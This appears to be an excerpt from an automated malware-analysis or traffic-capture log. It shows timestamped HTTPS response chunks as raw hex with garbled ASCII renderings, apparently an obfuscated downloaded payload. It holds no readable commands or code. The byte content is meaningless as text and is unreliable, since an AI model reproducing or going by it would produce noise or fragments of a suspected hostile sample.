                                                                              2022-06-01 23:53:56 UTC1644INData Raw: 18 f8 f9 f8 f8 0c 0c 0f 85 f9 f8 f8 f9 1d 0e fe 9a 20 5d f8 f8 02 6c fa f8 f8 13 13 32 7d f8 f8 f8 1e 20 ff f8 f8 02 ff 67 00 f8 f8 02 6a bb 73 f8 68 67 01 f8 f8 02 0d 25 6a 1e 00 6a e5 73 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 67 02 f8 f8 02 0f 85 0d f8 f8 f9 1d 0e c8 ff f8 f8 13 20 10 f8 f8 02 9a 67 94 f8 f8 02 14 25 3c 1e 01 0c 0f 85 f9 f8 f8 f9 1d 0e fa fb 20 56 f8 f8 fe 84 30 f8 f8 f9 9a 67 03 f8 f8 02 9d ff f8 f8 13 16 25 1a 1e 12 31 45 f7 f7 f7 09 fc 22 02 30 3c f7 f7 f7 02 30 43 f7 f7 f7 03 30 6e f7 f7 f7 04 23 84 05 23 b2 0b fc 23 d3 f8 f8 16 fa 20 7e f8 f8 02 22 16 fa 20 7e f8 f8 02 22 fb 28 fb f8 49 f8 f8 f8 f8 f8 f8 f8 6a 21 74 f8 68 6a 4e 48 f8 68 20 57 f8 f8 fe 6a 2d 74 f8 68 6a 4e 48 f8 68 20 57 f8 f8 fe 20 fd f8 f8 23 78 0c f8 f8 fc 6a 3c 48
                                                                              Data Ascii: ]l2} gjshg%jjsh %g g%< V0g%1E"0<0C0n### ~" ~"(Ij!thjNHh Wj-thjNHh W #xj<H
                                                                              2022-06-01 23:53:56 UTC1646INData Raw: f8 f8 f8 f9 f8 f8 f9 f8 f8 f8 f8 f8 f8 f8 f8 18 f9 f8 f8 18 f9 f8 f8 00 f8 f8 f8 f9 f8 f8 f9 0b 28 00 f8 cb f8 f8 f8 1c f8 f8 09 0e 10 32 a5 f8 f8 f8 1e 76 6b f8 f8 fc 76 6e f8 f8 fc 20 de f8 f8 fe fb 20 db f8 f8 fe 0d 32 8f f8 f8 f8 1e 0e 62 0e 31 8c f8 f8 f8 1e 23 53 fa 00 fa 86 61 62 55 cc 76 d7 f8 f8 fc 76 d5 f8 f8 fc fa 00 fa 86 61 62 55 cc 89 ff 00 ff 86 61 62 55 cc 89 59 20 80 f9 f8 fe 76 d6 f8 f8 fc fa 00 0f 62 50 fa 86 61 62 55 cc 89 20 83 f9 f8 fe 51 18 f8 f9 f8 f8 50 18 f8 f9 f8 f8 55 20 86 f9 f8 fe 94 00 0f 62 50 0e 24 35 1e 00 fa 86 61 0f 51 62 fe 0f 50 66 52 f6 fa 0e f6 f9 16 25 23 1e 01 25 85 07 f8 fa 86 61 0f 51 0e 24 18 1e 1e fa 0b fc 09 fc 22 02 30 46 f7 f7 f7 03 30 5c f7 f7 f7 04 30 5f f7 f7 f7 04 23 b9 05 23 cb 20 02 f8 f8 23 23 d3 f8
                                                                              Data Ascii: (2vkvn 2b1#SabUvvabUabUY vbPabU QPU bP$5aQbPfR%#%aQ$"0F0\0_## ##
                                                                              2022-06-01 23:53:56 UTC1647INData Raw: 0f 51 0b fd 09 fd 0e 27 b0 77 3e f8 f8 fc 09 fc 18 f9 f8 f8 02 50 20 9c f8 f8 02 20 9d f8 f8 02 6c 0e f8 f8 f9 0b 00 d6 fe 1e d5 3b f9 f8 f8 09 00 67 9e f8 f8 02 24 12 ff 67 9f f8 f8 02 09 00 20 a0 f8 f8 02 0b 01 d5 10 f9 f8 f8 1e d5 18 f9 f8 f8 09 00 67 a1 f8 f8 02 0b 02 09 02 86 61 0f 50 0b 03 09 03 85 0d f8 f8 f9 0b 04 09 04 0e c8 f9 f8 f8 f9 20 10 f8 f8 02 9a 0f 0b 05 23 15 09 04 09 05 09 02 09 05 0f 51 92 67 a2 f8 f8 02 9a 09 05 0f 1d 31 82 f8 f8 f8 50 0b 05 09 05 09 03 2a d5 76 93 f8 f8 02 09 00 67 a3 f8 f8 02 09 04 fe 0f 6b a4 f8 f8 02 0b 06 09 06 67 a5 f8 f8 02 0b 07 09 07 76 a6 f8 f8 02 67 a7 f8 f8 02 09 03 0f 29 04 09 07 76 a8 f8 f8 02 67 a7 f8 f8 02 09 03 10 29 04 09 07 76 a9 f8 f8 02 67 a7 f8 f8 02 09 03 11 29 04 09 07 76 aa f8 f8 02 67 a7 f8
                                                                              Data Ascii: Q'w>P l;g$g gaP #Qg1P*vgkgvg)vg)vg)vg
                                                                              2022-06-01 23:53:56 UTC1648INData Raw: 1d 0f 50 04 89 17 08 5a 50 76 43 f8 f8 fc 00 1d 0f 50 04 89 16 5a 50 76 43 f8 f8 fc 00 1d 0f 50 04 89 50 03 76 5e f8 f8 fc 76 e3 f8 f8 fc 76 6f f8 f8 fc 20 de f8 f8 fe 76 43 f8 f8 fc 00 ff 20 9b f9 f8 fe 20 c3 f8 f8 fe 0b fc 76 a6 f8 f8 fc 76 e3 f8 f8 fc 76 6f f8 f8 fc 20 de f8 f8 fe 09 fc 0e 09 fc 86 61 20 9b f9 f8 fe 20 2c f9 f8 fe 0b fd 76 45 f8 f8 fc 24 0a 76 44 f8 f8 fc fa 09 fd 67 bd f8 f8 02 d6 fb 1e d6 f8 09 fd 0b fe d6 01 1e 0e 25 fb 0c 0b fe d6 f8 09 fe 22 08 f8 30 cd f6 f7 f7 03 30 e9 f6 f7 f7 04 30 eb f6 f7 f7 04 30 f8 f7 f7 f7 05 30 fa f7 f7 f7 03 30 05 f7 f7 f7 f8 f8 f9 14 f8 f8 f8 f8 09 f9 07 18 f9 fb f9 f8 f8 f9 f8 f8 b4 f8 65 21 f9 01 f9 f8 f8 f9 13 28 fd f8 f6 f8 f8 f8 24 f8 f8 09 6a 16 48 f8 68 78 41 f8 f8 fc 6a 67 76 f8 68 78 42 f8 f8
                                                                              Data Ascii: PZPvCPZPvCPPv^vvo vC vvvo a ,vE$vDg%"000000e!($jHhxAjgvhxB
                                                                              2022-06-01 23:53:56 UTC1649INData Raw: 23 f0 f8 32 17 6e 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 6f 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 70 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 71 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 72 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 73 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 74 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 75 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 76 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 77 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 3e 18 78 f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 79 f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7a f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7b f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7c f8 f8 f8 14 25 fa 1e 22 20
                                                                              Data Ascii: #2n%" #2o%" #2p%" #2q%" #2r%" #2s%" #2t%" #2u%" #2v%" #2w%" #>x%" #>y%" #>z%" #>{%" #>|%"
                                                                              2022-06-01 23:53:56 UTC1651INData Raw: ae 37 b3 46 49 de f9 5a 6b db b6 a5 51 55 31 75 b9 e6 f5 5f 99 a4 3e bc 49 20 f0 65 47 9e 19 b9 da 18 49 8f e5 83 3f 6d 69 18 04 ea 1d d8 b5 e3 a9 04 12 47 c2 81 5f c6 03 18 a3 d3 7b 9e 76 63 cf 0a 76 a5 18 70 bb 59 61 27 ad 5c 8a 44 36 ce 52 7d 78 44 57 6b f3 67 e9 30 c7 5e fc 49 2d bf b1 19 61 47 5e 71 c9 bf 9a a4 2a f3 a3 b7 7c f6 6f b1 80 c6 3a 98 08 fd 4e 64 59 be c2 95 35 f8 8c 15 6f 6c 09 3d fa bd b0 10 18 39 2d fd 20 91 52 f0 a7 8b b4 e9 df 86 b8 65 48 a6 9b 41 a4 d6 f8 5e 02 f5 81 1b 6f 65 e5 99 c1 92 3e bc a7 14 56 81 d5 d2 a4 b1 75 7d c3 cf af ee 19 85 8e 5b d8 2f 6f 7d ab 6c eb 4c 16 71 f9 96 30 f0 f3 e7 36 d3 1d a8 8f f5 1f a4 fd d9 b3 1c 24 e0 f3 12 e9 c1 5d 8e ea 4a 13 f9 86 4a 55 47 13 aa 62 3e f9 63 ff d5 d9 40 80 3f 03 c6 71 8a 28 c0 df
                                                                              Data Ascii: 7FIZkQU1u_>I eGI?miG_{vcvpYa'\D6R}xDWkg0^I-aG^q*|o:NdY5ol=9- ReHA^oe>Vu}[/o}lLq06$]JJUGb>c@?q(
                                                                              2022-06-01 23:53:56 UTC1652INData Raw: cb 5a ac 96 03 de 37 5d 9e b6 5f 83 8c c7 36 33 91 4d 6a 37 51 9e 97 db d8 51 d7 e3 72 67 2d c2 7d a2 55 a6 c5 b4 eb d0 fb 59 5c 04 e2 c0 72 a1 aa a0 7b 8e 1d 75 4f ff e0 d4 e3 3a 42 74 d8 1f ce b0 85 67 a7 85 53 55 93 67 a0 02 05 7f 43 66 e5 e9 0a b1 8b 86 37 a9 89 5c bf 90 a1 4e 3f c9 fc 69 33 a1 29 e4 a9 7e 54 58 58 37 6a 12 be c1 0f e8 f6 a5 15 c9 12 80 aa b1 9f 04 8f 86 5c 93 b9 af 40 36 09 6e 81 49 73 ae 75 c6 80 4b 3b e3 32 06 7b 03 31 64 e0 d6 c4 cc ab 76 6e c2 38 92 1f 2f ad cd e6 5a 47 7d 02 4a 92 c2 62 86 21 04 9b fe 4c 5f 2e 6b 7a 72 22 3c 94 b7 7c e4 78 ab c1 ee f9 c4 94 9b 8b 46 22 3c 99 ab ad 33 52 f8 30 32 db 28 a2 3a 77 fe 9b 48 a1 ee ac db 8a f8 dd fa 1d 6e c2 7e a5 8f cf 70 0c 25 9b 26 51 4d 47 66 48 89 b6 2f 78 94 ef be b1 6f 3a e9 b0
                                                                              Data Ascii: Z7]_63Mj7QQrg-}UY\r{uO:BtgSUgCf7\N?i3)~TXX7j\@6nIsuK;2{1dvn8/ZG}Jb!L_.kzr"<|xF"<3R02(:wHn~p%&QMGfH/xo:
                                                                              2022-06-01 23:53:56 UTC1653INData Raw: 87 ae ba f9 49 94 0d 42 88 f6 a1 f9 0d 81 fb 85 9d 5d 3f 9e 0e b3 5b e8 65 ec b5 6b ee 51 d4 f5 11 28 a6 92 23 75 a5 b2 c1 e3 6b 57 b2 27 86 9e 96 5a 7f d2 0e e7 37 bd 14 1e 67 c2 65 ae dc 36 8d 26 6d 55 41 bb 48 06 b3 f2 b3 c6 3e 76 e4 70 df df 4b c1 8d 68 e7 37 d3 da ed d8 c1 4f 5b 0f 58 ad d3 15 19 c0 3b bb db e9 b0 95 0b af 8a 13 30 88 2e ef 05 a6 5d 5e 5d 80 82 3d 63 1a f0 72 9e 10 71 b6 29 3e 22 c0 52 c6 2e 63 bb 15 cb 80 a7 d8 3b c2 6b d4 65 0c a7 86 ff 4c 10 f6 12 27 b5 d1 9b a8 76 95 9e ac 1b 34 d6 f6 4b 36 3b 06 8c 91 62 fb 22 6d 9f d3 ce 67 20 5d 59 fe 3c 45 6a 43 23 b0 af bf 76 83 2b 9e 35 59 3e 28 d0 37 63 62 51 fd af 3d ee bb a4 d0 a9 aa 2c f0 c7 e3 fb a8 3a 3f 65 9b d9 4d ee 18 9c 31 aa 38 ef 79 bf 36 83 ed c7 71 7b 70 7a 11 16 44 2e 28 1c
                                                                              Data Ascii: IB]?[ekQ(#ukW'Z7ge6&mUAH>vpKh7O[X;0.]^]=crq)>"R.c;keL'v4K6;b"mg ]Y<EjC#v+5Y>(7cbQ=,:?eM18y6q{pzD.(
                                                                              2022-06-01 23:53:56 UTC1655INData Raw: c0 0a e6 71 40 5e 90 90 d8 5b a8 9a 78 b9 99 85 a3 87 40 ec 1d dc ad 0c ce 0a 56 d9 2d 99 de c7 54 1c ab cf 8c b4 35 cf 1b ca cc 6f 38 d9 50 4b 4d ac bc 13 1f 7a 32 ac b3 d5 1d ee 4e 84 19 a4 22 25 89 78 8d 39 3b b4 47 cd e3 63 bc 6a 5d 7a 39 56 fc 2f 0f 3c 74 b1 bc fb b1 34 0d 04 f4 61 bc 7a c2 69 81 5a 87 bb 35 0d d3 e4 73 d7 c1 3e bc 0f 5f 84 79 e1 83 81 19 db 67 b8 0a 4d 2d 91 30 1f 90 24 28 0f ac a2 81 70 fd 33 ae 30 ee 54 3e e9 f2 b6 d7 fc 00 09 fe bd 2e e0 10 c6 08 22 a1 b5 1c 36 6b 2e e5 11 1c 7b 28 03 d6 5f f3 56 d9 27 ff f1 06 72 30 39 0a 11 e2 7c 7b da 8d dc 69 59 f2 ff cd 6e 6d 41 55 58 31 91 cc 23 68 6c 0c 4f 91 1b 03 1f 19 0e e0 2a b8 3d 54 30 ac 53 14 f1 3e 3f 90 db 96 66 8d 1c d0 ca f9 d4 05 a9 49 8f e1 03 b1 1e f4 11 7e a5 03 4f 81 b9 4b
                                                                              Data Ascii: q@^[x@V-T5o8PKMz2N"%x9;Gcj]z9V/<t4aziZ5s>_ygM-0$(p30T>."6k.{(_V'r09|{iYnmAUX1#hlO*=T0S>?fI~OK
                                                                              2022-06-01 23:53:56 UTC1656INData Raw: cb 6a 3b cb b5 42 e9 27 ec 41 ca 0b 99 70 be 06 d1 78 f9 85 ef a1 43 21 6a 58 ae 04 fb e7 35 7f 79 4a ed 0a 80 33 39 a8 14 d6 43 1a 68 8e 48 53 5c a2 da 77 f6 93 11 a8 20 eb 57 d7 68 74 cf c3 40 1e 62 48 03 47 94 a9 0e 9d 2f 9a 01 fe b9 ff f4 de 20 2b 9b c4 c1 d2 42 a5 28 fa 87 2a ff 8d 01 39 da 11 33 49 2e d9 4b a0 4f f7 e5 2a 0b c8 9c b0 db 4b 6a 68 43 82 d4 a2 8f 20 08 23 11 d0 ad bc 73 a9 7c 1f be b8 5f 76 66 bd 14 00 90 18 40 69 a8 76 2d cc b2 2f b1 43 81 cc bb c4 5e a6 b4 30 df 6b 71 8b bf 08 be c7 61 f0 f6 3e 62 ce d1 b0 c3 9e 05 7b 58 e9 3d af 88 57 08 b6 9c 8f fb 95 20 db 9f 00 da df 6f 82 90 cf 05 4d 75 cf a2 32 e1 26 d8 ae f0 30 85 0b 79 07 87 4f 79 03 63 a0 63 d7 57 5f db 42 6e 5f 76 ae 28 c4 5b 5f 08 e4 fd 2b d5 1b d4 43 f8 40 fe ba ef 73 55
                                                                              Data Ascii: j;B'ApxC!jX5yJ39ChHS\w Wht@bHG/ +B(*93I.KO*KjhC #s|_vf@iv-/C^0kqa>b{X=W oMu2&0yOyccW_Bn_v([_+C@sU
                                                                              2022-06-01 23:53:56 UTC1657INData Raw: b6 d9 c0 0f f1 c0 a7 3a de f3 07 d4 08 61 7b 06 72 2f 2f 61 67 c5 35 9b ba 72 af a2 69 95 50 ed 9f 28 c9 7c 59 66 ff 46 09 7b 89 6e 88 a7 95 1f 32 16 21 9c 1d 15 f3 91 a0 04 cd 4f 19 ae d6 eb fb 9d 3b ec 58 76 0f 67 5e e9 b9 dd fe fb 40 88 8d 0d bc 0d 05 79 db 02 3c 71 80 ac da 06 a1 25 c3 14 08 70 ee ec 1b 2a 50 a7 ac 2c 84 19 fe 63 b3 9a f5 2c 38 25 0d 4a 86 0c 22 4b 87 93 c6 54 50 33 db b7 17 35 0c 02 32 c5 aa 6c eb d8 a7 4e 03 6d 45 d0 4a 17 71 4f 1d eb 71 44 94 e7 91 c8 cd f0 7b a3 ea db 05 9a e5 58 27 bd 27 2d 76 65 61 ce ac ca d9 07 5b ba e5 21 ab d1 3a 00 c1 60 73 1d 90 04 ca cc 83 cd d1 01 6a 08 dd 4f a7 70 ce b4 a9 fe 1c 86 73 79 4d 71 ad ee f6 e7 11 95 2c 74 89 14 c5 90 0d bf 38 d2 b2 e5 d7 2f 64 9b 93 d1 67 54 fe 5a ae 82 46 8e 89 57 3c c5 a8
                                                                              Data Ascii: :a{r//ag5riP(|YfF{n2!O;Xvg^@y<q%p*P,c,8%J"KTP352lNmEJqOqD{X''-vea[!:`sjOpsyMq,t8/dgTZFW<
                                                                              2022-06-01 23:53:56 UTC1659INData Raw: 0f 38 83 97 ad 7b 18 be 18 27 5b 18 6c 61 65 5d 67 6d 6c 18 2d 18 1e 1e 18 65 67 6e 5d 6e 6b 6b 5d 6a 6e 59 2a 5f 6d 59 6a 5c a4 b6 ac 59 a6 c4 9c ca c0 c6 37 20 82 8d 3f 51 fa fe c6 b9 5b be 59 0f fb 34 ed 81 4e 87 84 a2 17 fb e0 5e 99 32 0f fb 50 ff 6c d5 70 15 1e b5 05 7b 34 98 02 6f bb 19 43 10 15 c8 df af e3 0c 38 42 78 b2 04 25 76 90 53 f9 c2 09 c4 a8 56 75 20 25 43 34 d6 4b ea 38 8f 90 6b db 81 95 fb ad 01 74 30 96 93 62 a8 d6 fc 9a 3c 01 a4 aa 4b 92 b1 97 9f b2 63 a7 2d e4 4e 38 1a 6b b0 92 07 b4 f5 0c ff 47 6f b6 d8 b5 73 64 2f 33 06 e1 8b dc 3c d0 21 e0 ed 3f 41 51 3e 42 3f 53 40 35 1d 61 8b 7f 03 8f a3 fb 1b f1 b5 e1 37 f6 6f f1 d6 64 a4 35 27 d7 68 1d be ad c1 a5 01 24 6f 7d 6d 35 3e c5 9f 7e d5 f2 31 38 ad 27 23 03 00 42 d8 44 63 d2 a5 02 06
                                                                              Data Ascii: 8{'[lae]gml-egn]nkk]jnY*_mYj\Y7 ?Q[Y4N^2Plp{4oC8Bx%vSVu %C4K8kt0b<Kc-N8kGosd/3<!?AQ>B?S@5a7od5'h$o}m5>~18'#BDc
                                                                              2022-06-01 23:53:56 UTC1660INData Raw: fc f8 f8 f8 fd f8 f8 f8 fa f8 f8 f8 00 f8 f8 f8 fc f8 f8 f8 0a f8 f8 f8 f9 f8 f8 f8 ff f8 f8 f8 f9 f8 f8 f8 0e f8 f8 f8 f9 f8 f8 f8 02 f8 f8 f8 f8 f8 f9 f8 f9 f8 f8 f8 f8 f8 fe f8 15 f8 1c f8 fe f8 31 f8 1c f8 02 f8 7b f8 66 f8 fe f8 c4 fa 1c f8 fe f8 01 fb 1c f8 fe f8 68 fc 71 fc 06 f8 17 fe 25 fe fe f8 38 fe 48 fe fe f8 59 fe 65 fe fe f8 7a fe 1c f8 fe f8 87 fe 94 fe fe f8 af fe be fe fe f8 ee fe 1c f8 fe f8 f4 fe 1c f8 fe f8 07 ff 1c f8 06 f8 1c ff 25 fe fe f8 3b ff 1c f8 fe f8 50 ff 57 ff fe f8 72 ff 1c f8 fe f8 81 ff 8a ff fe f8 a7 ff 1c f8 fe f8 b9 ff 8a ff fe f8 c7 ff 8a ff fe f8 e2 ff e7 ff fe f8 f8 00 e7 ff fe f8 1d 00 1c f8 06 f8 36 00 25 fe 06 f8 78 00 25 fe fe f8 9b 00 a3 00 fe f8 d9 00 1c f8 fe f8 09 01 1c f8 fe f8 a0 01 e7 ff 0a f8 58 fb c0
                                                                              Data Ascii: 1{fhq%8HYez%;PWr6%x%X
                                                                              2022-06-01 23:53:56 UTC1661INData Raw: fb f8 f8 09 f8 3a f8 8b f8 0b f9 f8 f8 fd fb f8 f8 09 f8 3a f8 8b f8 0b f9 f8 f8 ff fb f8 f8 09 f8 3a f8 8b f8 f8 f9 f8 f8 2b f8 25 f8 fd f8 3a f8 8b f8 08 f9 f8 f8 e1 f8 e1 f8 09 f8 3c f8 8b f8 f8 f9 f8 f8 29 f8 29 f8 fd f8 3c f8 8b f8 08 f9 f8 f8 e1 f8 23 f8 09 f8 3e f8 8b f8 f8 f9 08 f8 23 f8 29 f8 0d f8 3e f8 8b f8 f8 f8 08 f8 29 f8 af f8 0d f8 3e f8 8c f8 f8 f8 08 f8 29 f8 e5 fa 0d f8 3e f8 8d f8 f8 f8 08 f8 2b f8 23 f8 0d f8 3e f8 8e f8 f8 f8 08 f8 e5 fa 23 f8 0d f8 3e f8 8f f8 f8 f8 08 f8 e1 f8 29 f8 0d f8 3e f8 90 f8 f9 f9 f8 f8 0b fb 15 fb 01 f8 3e f8 91 f8 79 f9 f8 f8 2d fb 3d fb fd f8 3e f8 95 f8 79 f9 08 f8 58 fb 3d fb fd f8 40 f8 97 f8 f8 f9 f8 f8 23 f8 23 f8 fd f8 40 f8 98 f8 0b f9 f8 f8 23 f8 f8 f8 09 f8 41 f8 98 f8 f8 f8 f8 f8 2b f8 2b f8
                                                                              Data Ascii: :::+%:<))<#>#)>)>)>+#>#>)>>y-=>yX=@##@#A++
                                                                              2022-06-01 23:53:56 UTC1663INData Raw: f8 f8 3d fc f8 f8 01 f8 d6 f8 82 f9 f8 f9 f8 f8 40 fc f8 f8 01 f8 d7 f8 85 f9 f8 f9 f8 f8 43 fc f8 f8 01 f8 d8 f8 88 f9 f8 f9 f8 f8 46 fc f8 f8 01 f8 d9 f8 8b f9 f8 f9 f8 f8 49 fc f8 f8 01 f8 da f8 8e f9 f8 f9 f8 f8 4c fc f8 f8 01 f8 dc f8 91 f9 f8 f9 f8 f8 4f fc f8 f8 01 f8 de f8 94 f9 f8 f9 f8 f8 52 fc f8 f8 01 f8 e0 f8 97 f9 f8 f9 f8 f8 55 fc f8 f8 01 f8 e2 f8 9a f9 f8 f9 f8 f8 58 fc f8 f8 01 f8 e4 f8 9d f9 f8 f9 f8 f8 5c fc f8 f8 01 f8 e5 f8 a0 f9 f8 f9 f8 f8 60 fc f8 f8 01 f8 e7 f8 a3 f9 f8 f9 f8 f8 64 fc f8 f8 01 f8 e8 f8 a6 f9 0e f8 23 f8 02 f8 0e f8 23 f8 06 f8 0e f8 7d fc 06 f8 0e f8 7d fc 09 f8 0e f8 81 fc 06 f8 0e f8 8c fc 06 f8 0e f8 99 fc 06 f8 0e f8 a6 fc 0c f8 0e f8 b1 fc 10 f8 0e f8 bc fc 10 f8 0e f8 c9 fc 10 f8 0e f8 d5 fc 13 f8 0e f8 e2
                                                                              Data Ascii: =@CFILORUX\`d##}}
                                                                              2022-06-01 23:53:56 UTC1664INData Raw: bd 03 9b fa 0b f8 10 fc a6 fa 0b f8 13 fc a6 fa 0b f8 16 fc b2 fa 0b f8 19 fc bb fa 0b f8 e4 03 bb fa 0b f8 1c fc bb fa 0b f8 e8 03 bb fa 0b f8 1f fc c5 fa 0b f8 22 fc c5 fa 0b f8 25 fc d0 fa 0b f8 07 04 d0 fa 0b f8 28 fc da fa 0b f8 2b fc e4 fa 0b f8 1e 04 e4 fa 0b f8 2e fc ee fa 0b f8 2f 04 ee fa 0b f8 31 fc ee fa 0b f8 45 04 ee fa 0b f8 34 fc ee fa 0b f8 56 04 ee fa 0b f8 37 fc fa fb 0b f8 98 04 fa fb 0b f8 3a fc 06 fb 0b f8 bc 04 06 fb 0b f8 3d fc 11 fb 0b f8 40 fc 1c fb 0b f8 43 fc 26 fb 0b f8 46 fc 26 fb 0b f8 49 fc 26 fb 0b f8 4c fc 30 fb 0b f8 00 05 30 fb 0b f8 4f fc 3a fb 0b f8 52 fc 43 fb 0b f8 55 fc 43 fb 0b f8 58 fc 43 fb 0b f8 5c fc 4e fb 0b f8 61 05 4e fb 0b f8 60 fc 59 fb 0b f8 66 05 59 fb 0b f8 64 fc 65 fb 0b f8 80 05 71 fb 0b f8 84 05 7c
                                                                              Data Ascii: "%(+./1E4V7:=@C&F&I&L00O:RCUCXC\NaN`YfYdeq|
                                                                              2022-06-01 23:53:56 UTC1665INData Raw: f8 38 3c f8 f8 f8 f8 8e f8 54 09 5e fb 22 f8 5c 3c f8 f8 f8 f8 8e f8 78 09 6a fb 24 f8 80 3c f8 f8 f8 f8 8e f8 9d 09 76 fb 26 f8 a0 3c f8 f8 f8 f8 8e f8 0f fe 4a fd 27 f8 20 3d f8 f8 f8 f8 8e f8 b7 09 52 fd 27 f8 90 3d f8 f8 f8 f8 8e f8 12 fd a2 fc 29 f8 dc 3d f8 f8 f8 f8 89 f8 23 f8 59 fd 29 f8 78 42 f8 f8 f8 f8 8e f8 0b fe a2 fc 29 f8 c0 42 f8 f8 f8 f8 8e f8 4a f8 a2 fc 29 f8 0c 43 f8 f8 f8 f8 8e f8 13 fe a2 fc 29 f8 f8 f8 f8 f8 78 f8 8e 58 da 09 62 fd 29 f8 58 43 f8 f8 f8 f8 7e 10 0c 07 97 fa 2b f8 60 43 f8 f8 f8 f8 89 10 02 07 a2 fc 2b f8 f8 f8 f8 f8 fb f8 7e 10 0c 07 e4 fc 2b f8 f8 f8 f8 f8 fb f8 be f9 d2 ff 69 fd 2d f8 f8 f8 f8 f8 fb f8 be f9 51 07 70 fd 2f f8 f8 f8 f8 f8 fb f8 be f9 81 07 7d fd 33 f8 e8 43 f8 f8 f8 f8 7e 10 0c 07 97 fa 34 f8 f0 43
                                                                              Data Ascii: 8<T^"\<xj$<v&<J' =R'=)=#Y)xB)BJ)C)xXb)XC~+`C+~+i-Qp/}3C~4C
                                                                              2022-06-01 23:53:56 UTC1666INData Raw: 97 fa af f8 68 56 f8 f8 f8 f8 7e 10 0c 07 97 fa af f8 70 56 f8 f8 f8 f8 fe 10 0c 07 42 f9 af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff dc fe af f8 78 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff e4 fe af f8 88 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff e9 fe af f8 98 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff ef fe af f8 a8 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff f4 fe af f8 b8 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af
                                                                              Data Ascii: hV~pVB>xV>V>V>V>V
                                                                              2022-06-01 23:53:56 UTC1668INData Raw: 8e ff af f8 68 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 96 ff af f8 78 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 9d ff af f8 88 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff a4 ff af f8 98 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff ab ff af f8 a8 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 70 ff af f8 b8 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff b2 ff af
                                                                              Data Ascii: hX>xX>X>X>X>pX>
                                                                              2022-06-01 23:53:56 UTC1669INData Raw: 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 4f 00 af f8 80 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 55 00 af f8 94 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 5a 00 af f8 a8 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 60 00 af f8 bc 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 66 00 af f8 d0 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff c3 f8 af f8 e4 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07
                                                                              Data Ascii: >OZ>UZ>ZZ>`Z>fZ>Z
